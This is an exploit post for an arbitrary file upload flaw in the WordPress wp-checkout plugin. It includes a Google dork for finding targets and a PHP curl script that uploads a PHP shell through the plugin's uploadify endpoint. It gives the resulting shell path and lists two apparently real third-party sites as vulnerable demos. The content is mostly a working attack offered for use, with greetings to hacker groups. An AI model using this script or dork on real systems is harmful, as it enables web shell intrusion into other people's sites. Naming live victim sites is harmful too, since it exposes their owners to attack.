facebook facebook twitter rss

Wordpress Plugins wp-checkout Arbitrary File Upload Vulnerability

Author: Gastro-Dz , Published: 04-01-2013
-------------------------------------------------------------------------------
Wordpress Plugins wp-checkout Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------


############################################################################
# Author : Gastro-Dz #
# Date : 02/01/2013 #
# Facebook => http://fb.me/Gastr0 #
# Vandor : http://wordpress.org/extend/plugins/wordpress-checkout/ #
# Google Dork => inurl:/wp-content/plugins/wp-checkout/vendors/uploadify #
# Tested on : Windows 7 , Kubuntu 11.0.4 #
############################################################################

Exploit : uploadshell.php

<?php
 
$uploadfile
="Gastro.php";
$ch curl_init("http://localhost/wordpress/wp-content/plugins/wp-checkout/vendors/uploadify/upload.php");
curl_setopt($chCURLOPT_POSTtrue);
curl_setopt($chCURLOPT_POSTFIELDS,
              array(
'Filedata'=>"@$uploadfile",
              
'folder'=>'/wp-content/plugins/wp-checkout/vendors/uploadify/'));
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$postResult curl_exec($ch);
curl_close($ch);
 
  print 
"$postResult";
?> 


Shell Access : http://localhost/wordpress/wp-content/uploads/wp-checkout/uploadify/random_name.php
-------------------
<?php
phpinfo
();
?>

------------------------------

[#] Demos Vulnd sites :

http://207.67.52.103/wp-content/uploads/wp-checkout/uploadify/upload.php
http://www.amantofish.com/wp-content/uploads/wp-checkout/uploadify/upload.php

[#] Greeting ####################################################################################################################################################
#
EvilDz - Hacker-1420 - Jago-dz - DamaneDz - Th3 killer Dz - HTC28DZ - Oxyl - Over-x - hacker-fire - foolox - the viper L3b r1'Z & Dz-root.com & Sec4ever.com #
#
#################################################################################################################################################################

------------------------------ The End ---------------------------------------------------

Like us on Facebook :